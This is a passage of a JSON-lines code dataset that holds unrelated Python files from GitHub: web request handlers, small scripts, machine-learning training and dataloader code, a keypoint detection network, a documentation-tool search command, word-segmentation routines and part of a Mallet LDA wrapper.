decision_service\n\n def post(self):\n super(RequestInitialDecisionHandler, self).authenticate(self.request)\n if self.current_user is None:\n self.no_access()\n return\n\n user_id = self.current_user.get_user_id()\n body = json.loads(self.request.body)\n decision = self.decision_service.get_initial_decision(user_id, body)\n self.write(BinaryResponse(decision).to_dict())\n self.set_status(200)\n\n\nclass RequestActivityDecisionHandler(AuthenticatedHandlerBase):\n\n def initialize(self, decision_service, user_service):\n super(RequestActivityDecisionHandler, self).initialize(user_service)\n self.decision_service = decision_service\n\n def post(self):\n super(RequestActivityDecisionHandler, self).authenticate(self.request)\n if self.current_user is None:\n self.no_access()\n return\n\n user_id = self.current_user.get_user_id()\n body = json.loads(self.request.body)\n decision = self.decision_service.get_activity_decision(user_id, body)\n self.write(BinaryResponse(decision).to_dict())\n self.set_status(200)\n","repo_name":"samurai-technology/smart-popup","sub_path":"smart-popup-backend/app/rest/decision/DecisionHandlers.py","file_name":"DecisionHandlers.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36400602769","text":"from lookups import century_dict, decade_dict\n\ndef convert_year_to_str(year):\n # int(year) is to turn the year input (which is a string) into an int. the int() the full thing\n # is wrapped in just rounds the answer to the nearest int. eg. 1111 / 100 = 11.11 but we just want the whole int 11. \n century = int(int(year) / 100)\n\n # here we are calculating how much time is left in the century to get the decade\n remaineder = int(year) - (century * 100)\n # then we do the same int() wrap thing to get decade - using the remainder \n decade = int(int(remaineder) / 10)\n\n # catching any error in getting str's from the dict.\n # eg. year is 5478 and we don't have a key for 54 \n try: \n centuryStr = century_dict[century]\n decadeStr = decade_dict[decade]\n return \"%s %s\" % (centuryStr, decadeStr)\n except:\n print('Something went wrong converting, rip.')\n\n\nprint('Welcome to the year to century and decade converter.')\nprint('I have no idea why this would be useful - but here we are :)')\n\nyearInput = input('Please enter a year: ')\nprint(convert_year_to_str(yearInput))\n","repo_name":"mackreid/year_to_cen_dec","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20107251249","text":"import os\nimport sys\nfrom dataclasses import dataclass\n\nfrom sklearn.ensemble import (\n AdaBoostClassifier,\n RandomForestClassifier,\n BaggingClassifier\n)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn.svm import SVC\n\n\nfrom src.exception import CustomException\nfrom src.logger import logging\n\nfrom src.utils import save_object,evaluate_models\n\n@dataclass\nclass ModelTrainerConfig:\n trained_model_file_path=os.path.join(\"artifacts\",\"model.pkl\")\n\nclass ModelTrainer:\n def __init__(self):\n self.model_trainer_config=ModelTrainerConfig()\n\n\n def initiate_model_trainer(self,train_array,test_array):\n try:\n logging.info(\"Split training and test input data\")\n X_train,y_train,X_test,y_test=(\n train_array[:,:-1],\n train_array[:,-1],\n test_array[:,:-1],\n test_array[:,-1]\n )\n models = {\n \"Random Forest\": RandomForestClassifier(),\n \"Decision Tree\": DecisionTreeClassifier(),\n \"Logistic Regression\": LogisticRegression(),\n \"XGBClassifier\": XGBClassifier(),\n \"AdaBoost Classifier\": AdaBoostClassifier()\n }\n params={\n \"Decision Tree\": {\n 'criterion':['gini', 'entropy', 'log_loss']\n },\n \"Random Forest\":{\n 'n_estimators': [8,16,32,64,128,386]\n },\n \"Gradient Boosting\":{\n 'learning_rate':[.1,.01,.05,.001],\n 'subsample':[0.6,0.7,0.75,0.8,0.85,0.9],\n 'n_estimators': [8,16,32,64,128,256]\n },\n \"Logistic Regression\":{},\n \"XGBClassifier\":{\n 'learning_rate':[.3,.5,.01,.1],\n 'n_estimators': [3,10,30]\n },\n \"AdaBoost Classifier\":{\n 'learning_rate':[.3,.5,.01,.1],\n 'n_estimators': [3,10,30]\n }\n \n }\n\n model_report:dict=evaluate_models(X_train=X_train,y_train=y_train,X_test=X_test,y_test=y_test,\n models=models,param=params)\n \n ## To get best model score from dict\n best_model_score = max(sorted(model_report.values()))\n\n ## To get best model name from dict\n\n best_model_name = list(model_report.keys())[\n list(model_report.values()).index(best_model_score)\n ]\n best_model = models[best_model_name]\n\n if best_model_score<0.6:\n raise CustomException(\"No best model found\")\n logging.info(f\"Best found model on both training and testing dataset\")\n\n save_object(\n file_path=self.model_trainer_config.trained_model_file_path,\n obj=best_model\n )\n\n predicted=best_model.predict(X_test)\n print(best_model_name)\n\n accuracy = accuracy_score(y_test, predicted)\n return accuracy\n \n\n\n\n \n except Exception as e:\n raise CustomException(e,sys)","repo_name":"HARISH-VARMA-GIT/ml_project","sub_path":"src/components/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18889149315","text":"# from https://github.com/lightly-ai/lightly/blob/develop/lightly/data/collate.py\n\nimport torch, glob, cv2, math, random, os\nimport numpy as np\nimport pickle as pkl\nfrom tqdm import tqdm\n\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import List\n\nimport torchvision\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as F\n\nimport lightly.data as data\n\nimagenet_normalize = {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\n\ndef compute_mean_and_std(root, CHANNEL_NUM = 3, amount = 0.1, selection = False):\n\n\ttypes = ('*.png', '*.jpg')\n\ttraining_images = []\n\tfor files in types:\n\t\ttraining_images.extend(glob.glob(root + '/*/' + files))\t\n\n\tif selection:\n\t\ttraining_images = random.sample(training_images, math.ceil(len(training_images)*amount))\n\n\tpixel_num = 0\n\tchannel_sum = np.zeros(CHANNEL_NUM)\n\tchannel_sum_squared = np.zeros(CHANNEL_NUM)\n\n\tfor i in tqdm(training_images):\n\t\tim = cv2.imread(i)\n\t\tim = im/255.0\n\n\t\tpixel_num += (im.size/CHANNEL_NUM)\n\t\tchannel_sum += np.sum(im, axis = (0, 1))\n\t\tchannel_sum_squared += np.sum(np.square(im), axis=(0, 1))\n\n\tbgr_mean = channel_sum/pixel_num\n\tbgr_std = np.sqrt(channel_sum_squared/pixel_num - np.square(bgr_mean))\n\n\t# change the format from bgr to rgb\n\trgb_mean = list(bgr_mean)[::-1]\n\trgb_std = list(bgr_std)[::-1]\n\n\tstats = [rgb_mean, rgb_std]\n\twith open(root + os.sep + 'rgb_stats.pkl', 'wb') as f:\n\t\tpkl.dump(stats, f) \n\n\treturn rgb_mean, rgb_std\n\ndef load_rgb_mean_std(root, amount, selection):\n try:\n stats = []\n \n with open(root + os.sep + 'rgb_stats.pkl', 'rb') as f:\n stats = pkl.load(f)\n \n mean_ = stats[0]\n std_ = stats[1]\n except:\n mean_, std_ = compute_mean_and_std(root = root, amount = amount, selection = selection)\n\n return mean_, std_\n\ndef test_transforms(img_crop_size, norm_dict):\n\t\n\tTT = T.Compose([\n\t\tT.RandomCrop(size = img_crop_size, padding = None, \n\t\t\tpad_if_needed = True, fill = (255, 255, 255), \n\t\t\tpadding_mode = 'constant'),\n\t\tT.ToTensor(),\n\t\tT.Normalize(mean = norm_dict['mean'],\n\t\t\tstd = norm_dict['std'])])\n\treturn TT\n\nclass Invert(object):\n\n def __call__(self, x):\n \tx = F.invert(x)\n \treturn x\n\n def __str__(self):\n str_transforms = f\"Invert RGB channels\"\n return str_transforms\n\nclass BaseCollateFunction_MS(nn.Module):\n\tdef __init__(self, transform: torchvision.transforms.Compose):\n\n\t\tsuper(BaseCollateFunction_MS, self).__init__()\n\t\tself.transform = transform\n\t\tself.crop = T.RandomCrop(size = (600,400), \n\t\t\tpadding=None, \n\t\t\tpad_if_needed=True, \n\t\t\tfill = (255, 255, 255), \n\t\t\tpadding_mode='constant')\n\n\tdef forward(self, batch: List[tuple]):\n\n\t\tbatch_size = len(batch)\n\n\t\tbatch = [(self.crop(batch[i % batch_size][0]), batch[i % batch_size][1], batch[i % batch_size][2]) for i in range(batch_size)]\n\t\t\n\t\ttransforms = [self.transform(batch[i % batch_size][0]).unsqueeze_(0) for i in range(2 * batch_size)]\n\n\t\tlabels = torch.LongTensor([item[1] for item in batch])\n\n\t\tfnames = [item[2] for item in batch]\n\n\n\t\ttransforms = (\n\t\t\ttorch.cat(transforms[:batch_size], 0),\n\t\t\ttorch.cat(transforms[batch_size:], 0)\n\t\t\t)\n\n\t\treturn transforms, labels, fnames\n\nclass ImageCollateFunction_MS(BaseCollateFunction_MS):\n\tdef __init__(self,\n\t\timg_crop_size: int = 380, \t\t\n\t\tcjitter: dict = {'brightness': [0.4, 1.3], 'contrast': 0.6, 'saturation': 0.6,'hue': 0.4}, \n\t\tcjitter_p: float = 1., \n\t\trandaffine: dict = {'degrees': [-10,10], 'translate': [0.2, 0.2], 'scale': [1.3, 1.4], 'shear': 1}, \n\t\trandpersp: dict = {'distortion_scale': 0.1, 'p': 0.2}, \n\t\tgray_p: float = 0.2, \n\t\tgaussian_blur: dict = {'kernel_size': 3, 'sigma': [0.1, 0.5]},\n\t\trand_eras: dict = {'p': 0.5, 'scale': [0.02, 0.33], 'ratio': [0.3, 3.3], 'value': 0}, \n\t\tinvert_p: float = 0.05,\n\t\tnormalize: dict = imagenet_normalize):\n\n\t\tif isinstance(img_crop_size, tuple):\n\t\t\timg_crop_size_ = max(img_crop_size)\n\t\telse:\n\t\t\timg_crop_size_ = img_crop_size\n\n\t\ttransform = [\n\t\t\tT.RandomCrop(size = img_crop_size_, padding = None, pad_if_needed = True, fill = (255, 255, 255), padding_mode = 'constant'),\n\t\t\tT.RandomApply([T.ColorJitter(**cjitter)], p=cjitter_p),\n\t\t\tT.RandomAffine(**randaffine),\n\t\t\tT.RandomPerspective(**randpersp),\n\t\t\tT.GaussianBlur(**gaussian_blur),\n\t\t\tT.RandomGrayscale(gray_p),\n\t\t\tT.ToTensor(),\n\t\t\tT.RandomErasing(**rand_eras),\n\t\t\tT.RandomApply([Invert()], p=invert_p),\n\t\t\t]\n\n\n\t\tif normalize:\n\t\t\ttransform += [\n\t\t\t\tT.Normalize(\n\t\t\t\t\tmean=normalize['mean'],\n\t\t\t\t\tstd=normalize['std'])\n\t\t\t\t]\n \n\t\ttransform = T.Compose(transform)\n\n\t\tsuper(ImageCollateFunction_MS, self).__init__(transform)\n\nclass MSCollateFunction(ImageCollateFunction_MS):\n\tdef __init__(self,\n\t\timg_crop_size: int = 380, \t\t\n\t\tcjitter: dict = {'brightness': [0.4, 1.3], 'contrast': 0.6, 'saturation': 0.6,'hue': 0.4}, \n\t\tcjitter_p: float = 1., \n\t\trandaffine: dict = {'degrees': [-10,10], 'translate': [0.2, 0.2], 'scale': [1.3, 1.4], 'shear': 1}, \n\t\trandpersp: dict = {'distortion_scale': 0.1, 'p': 0.2}, \n\t\tgray_p: float = 0.2, \n\t\tgaussian_blur: dict = {'kernel_size': 3, 'sigma': [0.1, 0.5]},\n\t\trand_eras: dict = {'p': 0.5, 'scale': [0.02, 0.33], 'ratio': [0.3, 3.3], 'value': 0}, \n\t\tinvert_p: float = 0.05,\n\t\tnormalize: dict = imagenet_normalize):\n\n\t\tsuper(MSCollateFunction, self).__init__(\n\t\t\timg_crop_size = img_crop_size,\n\t\t\tcjitter = cjitter,\n\t\t\tcjitter_p = cjitter_p,\n\t\t\trandaffine = randaffine,\n\t\t\trandpersp = randpersp,\n\t\t\tgray_p = gray_p,\n\t\t\tgaussian_blur = gaussian_blur,\n\t\t\trand_eras = rand_eras,\n\t\t\tinvert_p = invert_p,\n\t\t\tnormalize = normalize\n\t\t\t)\n\nclass Lightly_DataLoader(Dataset):\n\tdef __init__(self, dir_, train_dir, transforms_params, batch_size, num_workers, train = True, \n\t\tshuffle = True, amount = 0.3, selection = False):\n\t\t\n\t\tself.dir_ = dir_\n\t\tself.train_dir = train_dir \t\t\n\t\tself.batch_size = batch_size\n\t\tself.num_workers = num_workers\n\t\tself.train = train\n\t\tself.shuffle = shuffle\n\t\tmean_, std_ = load_rgb_mean_std(self.train_dir, amount, selection)\n\t\tself.norm_dict = {'mean': mean_, 'std': std_}\n\t\tself.transforms_params = transforms_params\n\t\tself.transforms_params['normalize'] = self.norm_dict\n\n\tdef generate_dl(self):\n\t\t\n\t\tif self.train:\n\t\t\tdataset = data.LightlyDataset(input_dir = self.dir_)\n\t\t\tcollate_fn = MSCollateFunction(**self.transforms_params)\n\t\t\tdataloader = DataLoader(dataset,\n\t\t\t\tbatch_size = self.batch_size,\n\t\t\t\tshuffle = self.shuffle,\n\t\t\t\tcollate_fn = collate_fn,\n\t\t\t\tnum_workers = self.num_workers)\n\t\t\n\t\telse:\n\t\t\tTT = test_transforms(self.transforms_params['img_crop_size'],\n\t\t\t\tself.norm_dict)\n\t\t\tdataset = data.LightlyDataset(input_dir = self.dir_,\n\t\t\t\ttransform = TT)\n\t\t\tdataloader = DataLoader(dataset,\n\t\t\t\tbatch_size = self.batch_size,\n\t\t\t\tshuffle = False,\n\t\t\t\tdrop_last = False,\n\t\t\t\tnum_workers = self.num_workers)\n\t\t\n\t\treturn dataloader","repo_name":"L9L4/HI-SSL","sub_path":"csl/simclr/utils/dl.py","file_name":"dl.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40785058047","text":"from typing import Callable\n\nimport torch\nimport torch.nn.functional as F\n\nfrom sips.utils.image import image_grid, normalize_2d_coordinate\n\n\nclass KeypointNet(torch.nn.Module):\n \"\"\"\n Keypoint detection network.\n\n Parameters\n ----------\n use_color : bool\n Use color or grayscale images.\n do_upsample: bool\n Upsample desnse descriptor map.\n with_drop : bool\n Use dropout.\n do_cross: bool\n Predict keypoints outside cell borders.\n kwargs : dict\n Extra parameters\n \"\"\"\n\n def __init__(\n self,\n use_color: bool = True,\n do_upsample: bool = True,\n with_drop: bool = True,\n do_cross: bool = True,\n **kwargs,\n ) -> None:\n super().__init__()\n\n self.use_color = use_color\n self.with_drop = with_drop\n self.do_cross = do_cross\n self.do_upsample = do_upsample\n\n self.bn_momentum = 0.1\n self.cross_ratio = 2.0 if self.do_cross else 1.0\n self.cell = 8\n\n c0 = 3 if self.use_color else 1\n c1, c2, c3, c4, c5, d1 = 32, 64, 128, 256, 256, 512\n\n self.conv1a = torch.nn.Sequential(\n torch.nn.Conv2d(c0, c1, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c1, momentum=self.bn_momentum),\n )\n self.conv1b = torch.nn.Sequential(\n torch.nn.Conv2d(c1, c1, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c1, momentum=self.bn_momentum),\n )\n self.conv2a = torch.nn.Sequential(\n torch.nn.Conv2d(c1, c2, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c2, momentum=self.bn_momentum),\n )\n self.conv2b = torch.nn.Sequential(\n torch.nn.Conv2d(c2, c2, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c2, momentum=self.bn_momentum),\n )\n self.conv3a = torch.nn.Sequential(\n torch.nn.Conv2d(c2, c3, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c3, momentum=self.bn_momentum),\n )\n self.conv3b = torch.nn.Sequential(\n torch.nn.Conv2d(c3, c3, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c3, momentum=self.bn_momentum),\n )\n self.conv4a = torch.nn.Sequential(\n torch.nn.Conv2d(c3, c4, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n )\n self.conv4b = torch.nn.Sequential(\n torch.nn.Conv2d(c4, c4, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n )\n\n # Score Head.\n self.convDa = torch.nn.Sequential(\n torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n )\n self.convDb = torch.nn.Conv2d(c5, 1, kernel_size=3, stride=1, padding=1)\n\n # Location Head.\n self.convPa = torch.nn.Sequential(\n torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n )\n self.convPb = torch.nn.Conv2d(c5, 2, kernel_size=3, stride=1, padding=1)\n\n # Desc Head.\n self.convFa = torch.nn.Sequential(\n torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c4, momentum=self.bn_momentum),\n )\n if self.do_upsample:\n self.upsample = torch.nn.PixelShuffle(upscale_factor=2)\n self.convFb = torch.nn.Sequential(\n torch.nn.Conv2d(c5, d1, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(d1, momentum=self.bn_momentum),\n )\n self.convFaa = torch.nn.Sequential(\n torch.nn.Conv2d(c4, c5, kernel_size=3, stride=1, padding=1, bias=False),\n torch.nn.BatchNorm2d(c5, momentum=self.bn_momentum),\n )\n self.convFbb = torch.nn.Conv2d(c5, 256, kernel_size=3, stride=1, padding=1)\n\n self.relu = torch.nn.LeakyReLU(inplace=True)\n if self.with_drop:\n self.dropout = torch.nn.Dropout2d(0.2)\n self.pool = torch.nn.MaxPool2d(kernel_size=2, stride=2)\n\n # --------------------------------------------------------------------------\n # Prediction\n\n _forward_return_type = tuple[torch.Tensor, torch.Tensor, torch.Tensor]\n __call__: Callable[..., _forward_return_type]\n\n def forward(self, x: torch.Tensor) -> _forward_return_type:\n \"\"\"\n Processes a batch of images.\n\n Parameters\n ----------\n x : torch.Tensor\n Batch of input images (B, 3, H, W)\n\n Returns\n -------\n score : torch.Tensor\n Score map (B, 1, H_out, W_out)\n coord: torch.Tensor\n Keypoint coordinates (B, 2, H_out, W_out)\n feat: torch.Tensor\n Keypoint descriptors (B, 256, H_out, W_out)\n\n \"\"\"\n B, _, H, W = x.shape\n\n x = self.relu(self.conv1a(x))\n x = self.relu(self.conv1b(x))\n if self.with_drop:\n x = self.dropout(x)\n x = self.pool(x)\n x = self.relu(self.conv2a(x))\n x = self.relu(self.conv2b(x))\n if self.with_drop:\n x = self.dropout(x)\n x = self.pool(x)\n x = self.relu(self.conv3a(x))\n skip = self.relu(self.conv3b(x))\n if self.with_drop:\n skip = self.dropout(skip)\n x = self.pool(skip)\n x = self.relu(self.conv4a(x))\n x = self.relu(self.conv4b(x))\n if self.with_drop:\n x = self.dropout(x)\n\n B, _, Hc, Wc = x.shape\n\n score = self.relu(self.convDa(x))\n if self.with_drop:\n score = self.dropout(score)\n score = self.convDb(score).sigmoid()\n\n border_mask = torch.ones(B, Hc, Wc)\n border_mask[:, 0] = 0\n border_mask[:, -1] = 0\n border_mask[:, :, 0] = 0\n border_mask[:, :, -1] = 0\n border_mask = border_mask.unsqueeze(1)\n score = score * border_mask.to(score.device)\n\n center_shift = self.relu(self.convPa(x))\n if self.with_drop:\n center_shift = self.dropout(center_shift)\n center_shift = self.convPb(center_shift).tanh()\n\n step = self.cell / 2.0\n with torch.device(center_shift.device):\n center_base = (\n image_grid(B, Hc, Wc, dtype=center_shift.dtype, normalized=False)\n * self.cell\n ) + step\n\n coord_un = center_base.add(center_shift.mul(self.cross_ratio * step))\n coord = coord_un.clone()\n coord[:, 0].clamp_(0, H - 1)\n coord[:, 1].clamp_(0, W - 1)\n\n feat = self.relu(self.convFa(x))\n if self.with_drop:\n feat = self.dropout(feat)\n if self.do_upsample:\n feat = self.upsample(self.convFb(feat))\n feat = torch.cat([feat, skip], dim=1)\n feat = self.relu(self.convFaa(feat))\n feat = self.convFbb(feat)\n\n if not self.training:\n coord_norm = normalize_2d_coordinate(coord.clone(), H, W)\n feat = F.grid_sample(feat, coord_norm, align_corners=True)\n dn = torch.norm(feat, p=2, dim=1) # Compute the norm.\n feat = feat.div(torch.unsqueeze(dn, 1)) # Divide by norm to normalize.\n return score, coord, feat\n","repo_name":"tstreule/SIPS","sub_path":"sips/networks/keypoint_net.py","file_name":"keypoint_net.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40337256434","text":"from dexy.batch import Batch\nfrom dexy.commands.utils import init_wrapper\nfrom dexy.data import Generic\nfrom dexy.data import KeyValue\nfrom dexy.data import Sectioned\nfrom dexy.utils import defaults\nfrom operator import attrgetter\nimport dexy.exceptions\nimport json\nimport sys\n\ndef grep_command(\n __cli_options=False, # nodoc\n contents=False, # print out the contents of each matched file\n expr=\"\", # An expression partially matching document name.\n key=\"\", # An exact document key\n keyexpr=\"\", # Only search for keys matching this expression\n keylimit=10, # Maximum number of matching keys to print\n keys=False, # List keys in documents\n limit=10, # Maximum number of matching documents to print\n lines=False, # maximum number of lines of content to print\n **kwargs\n ):\n \"\"\"\n Search for documents and sections within documents.\n\n Dexy must have already run successfully.\n\n You can search for documents based on exact key or inexpect expression. The\n number of documents returned is controlled by --limit.\n\n You can print all keys in found documents by requesting --keys, number of\n results is controlled by --keylimit.\n\n You can search the section names/keys in found documents by passing a\n --keyexpr\n\n You can print contents of documents by requesting --contents, number of\n lines of content can be controlled by --lines.\n\n This does not search contents of documents, just document names and\n internal section names.\n \"\"\"\n\n artifactsdir = kwargs.get('artifactsdir', defaults['artifacts_dir'])\n wrapper = init_wrapper(locals())\n batch = Batch.load_most_recent(wrapper)\n \n if not batch:\n print(\"you need to run dexy first\")\n sys.exit(1)\n else:\n if expr:\n matches = sorted([data for data in batch if expr in data.key],\n key=attrgetter('key'))\n elif key:\n matches = sorted([data for data in batch if key == data.key],\n key=attrgetter('key'))\n else:\n raise dexy.exceptions.UserFeedback(\"Must specify either expr or key\")\n\n n = len(matches)\n if n > limit:\n print(\"only printing first %s of %s total matches\" % (limit, n))\n matches = matches[0:limit]\n\n for match in matches:\n print_match(match, keys, keyexpr, contents, keylimit, lines)\n\ndef print_match(match, keys, keyexpr, contents, keylimit, lines):\n print(match.key, \"\\tcache key:\", match.storage_key)\n\n if hasattr(match, 'keys'):\n if keyexpr:\n print_keys([key for key in list(match.keys()) if keyexpr in key], keylimit, lines)\n elif keys:\n print_keys(list(match.keys()), keylimit, lines)\n\n if contents:\n if isinstance(match, Sectioned):\n for section_name, section_contents in match.data().items():\n print(\" section: %s\" % section_name)\n print()\n print_contents(section_contents, lines)\n print()\n elif isinstance(match, KeyValue):\n pass\n elif isinstance(match, Generic):\n try:\n json.dumps(str(match))\n print_contents(str(match), lines)\n except UnicodeDecodeError:\n print(\" not printable\")\n\ndef print_keys(pkeys, keylimit, lines):\n n = len(pkeys)\n if n > keylimit:\n pkeys = pkeys[0:keylimit]\n \n for key in pkeys:\n print(' ', key)\n\n if n > keylimit:\n print(\" only printed first %s of %s total keys\" % (keylimit, n))\n\ndef print_contents(text, lines):\n text_lines = text.splitlines()\n for i, line in enumerate(text_lines):\n if lines and i > lines-1:\n continue\n print(\" \", line)\n\n if lines and lines < len(text_lines):\n print(\" only printed first %s of %s total lines\" % (lines, len(text_lines)))\n","repo_name":"dexy/dexy","sub_path":"dexy/commands/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"} +{"seq_id":"23448699371","text":"__author__ = 'jakub.bibro'\r\n\r\n\r\ndef solve(shy_levels):\r\n already_standing = 0\r\n to_invite = 0\r\n for shy_level, num_of_people in enumerate(shy_levels):\r\n if num_of_people > 0 and shy_level > already_standing:\r\n to_invite += shy_level - already_standing\r\n already_standing += to_invite\r\n already_standing += num_of_people\r\n\r\n return to_invite\r\n\r\nif __name__ == '__main__':\r\n test_cases = int(raw_input())\r\n shy_levels_map = {}\r\n for i in range(0, test_cases):\r\n max_shy_level, shy_levels = raw_input().split(' ')\r\n max_shy_level = int(max_shy_level)\r\n shy_levels = [int(l) for l in shy_levels]\r\n shy_levels_map = dict((ind, l) for ind, l in enumerate(shy_levels))\r\n solution = solve(shy_levels)\r\n print('Case #{}: {}'.format(i + 1, solution))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1317.py","file_name":"1317.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32407894887","text":"import sys\ninput = sys.stdin.readline\n\ndef fibonacci(n):\n global a, b\n if n == 0:\n a += 1\n return 0\n if n == 1:\n b += 1\n return 1\n if n not in fibo_dict:\n rst = fibonacci(n-1) + fibonacci(n-2)\n fibo_dict[n] = [a, b]\n return rst\n else:\n lst = fibo_dict[n]\n a += lst[0]\n b += lst[1]\n return fibo_dict[n][1]\n\nn = int(input())\nfibo_dict = {}\n\nfor _ in range(n):\n i = int(input())\n a, b = 0, 0\n fibonacci(i)\n print(a, b)\n\n##########################################################\n# best\nimport sys\n\nn = int(input())\ndp = [[1,0], [0,1]]\nq = [int(sys.stdin.readline()) for _ in range(n)]\n\nfor i in range(2, max(q)+1):\n dp.append([dp[i-2][0] + dp[i-1][0], dp[i-2][1] + dp[i-1][1]])\nfor i in q:\n print(dp[i][0], dp[i][1])","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/8 dynamic_programming/fibonacci_function_1003.py","file_name":"fibonacci_function_1003.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40537946508","text":"import codecs\n\n\ndef forward_maximum_matching(sentences, word_dict, max_word_len=3):\n for i, item in enumerate(sentences):\n item = item.strip()\n s, e, tmp = 0, min(max_word_len, len(item)), []\n while s < len(item):\n if item[s:e] in word_dict or s + 1 == e:\n tmp.append(item[s:e])\n s = e\n e = min(s + max_word_len, len(item))\n else:\n e -= 1\n sentences[i] = \" \".join(tmp)\n print(\"\\r%d / %d\" % (i+1, len(sentences)), end=\"\")\n print()\n return sentences\n\n\ndef backward_maximum_matching(sentences, word_dict, max_word_len=3):\n for i, item in enumerate(sentences):\n item = item.strip()\n s, e, tmp = max(len(item)-max_word_len, 0), len(item), []\n while s >= 0:\n if item[s:e] in word_dict or s + 1 == e:\n tmp.append(item[s:e])\n e = s\n s = max(e - max_word_len, 0) if s != 0 else -1\n else:\n s += 1\n tmp.reverse()\n sentences[i] = \" \".join(tmp)\n print(\"\\r%d / %d\" % (i+1, len(sentences)), end=\"\")\n print()\n return sentences\n\n\ndef main(sourcefile=\"data/data.txt\", dictfile=\"data/word.dict\", outfile=\"data/data.out\"):\n with codecs.open(sourcefile, \"r\", \"utf-8\") as fr:\n sentences = fr.readlines()\n\n with codecs.open(dictfile, \"r\", \"utf-8\") as fr:\n word_dict = [item.strip() for item in fr.readlines()]\n # sentences = forward_maximum_matching(sentences, word_dict, max_word_len=10)\n sentences = backward_maximum_matching(sentences, word_dict, max_word_len=10)\n\n with codecs.open(outfile, \"w\", \"utf-8\") as fw:\n for item in sentences:\n fw.write(\"%s\\n\" % item)\n print(\"%d docs have been cut.\" % len(sentences))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhang-weiming/HLT-NLP","sub_path":"最大匹配分词/3.cut.py","file_name":"3.cut.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31779933217","text":"import os, os.path, tempfile, shutil\nimport logging as log\nfrom subprocess import call\nimport numpy as np\nfrom scipy.stats.mstats import gmean\n\nclass MalletLDA:\n\t\"\"\"\n\tWrapper class for Mallet. Requires that a binary version of Mallet 2.0 is available locally.\n\t\"\"\"\n\tdef __init__( self, mallet_path, top = 100, seed = 1000, max_iters = 1000, alpha = 10.0, beta = 0.01, rerank_terms = False ):\n\t\t# settings\n\t\tself.mallet_path = mallet_path\n\t\tself.max_iters = max_iters\n\t\tself.num_threads = 4\n\t\tself.seed = seed\n\t\tself.top = top\n\t\tself.lda_alpha = alpha\n\t\tself.lda_beta = beta\n\t\tself.optimize_interval = 10\n\t\tself.rerank_terms = rerank_terms\n\t\tself.delete_temp_files = True\n\t\t# state\n\t\tself.partition = None\n\n\tdef apply( self, X, k = 2 ):\n\t\t\"\"\"\n\t\tApply topic modeling to the specific document-term matrix, using K topics.\n\t\t\"\"\"\n\t\tself.partition = None\n\t\tself.topic_rankings = None\n\t\t# create Mallet corpus\n\t\tdir_tmp = tempfile.mkdtemp()\n\t\tcorpus_path = self.__write_documents( X, dir_tmp )\n\t\tmallet_data_path = self.__import_data( corpus_path, dir_tmp )\n\t\tif not os.path.exists( mallet_data_path ):\n\t\t\traise Exception(\"Error: Failed to import data into Mallet format\")\n\t\t# run Mallet\n\t\tmallet_terms_path, mallet_docs_path, mallet_weights_path = self.__run_mallet( k, mallet_data_path, dir_tmp )\n\t\tif not ( os.path.exists( mallet_terms_path ) and os.path.exists( mallet_docs_path ) and os.path.exists( mallet_weights_path ) ):\n\t\t\traise Exception(\"Error: Failed to correctly run Mallet\")\n\t\t# any pre-processing required?\n\t\tif self.rerank_terms:\n\t\t\tself.topic_rankings = self.__rerank_terms( X.shape[1], k, mallet_weights_path )\n\t\telse:\n\t\t\tself.topic_rankings = self.__parse_topics( mallet_terms_path )\n\t\tlog.debug( \"Generated ranking set with %d topic rankings\" % len(self.topic_rankings) )\n\t\tself.partition = self.__parse_document_weights( X.shape[0], mallet_docs_path )\n\t\t# now tidy up, if required\n\t\tif 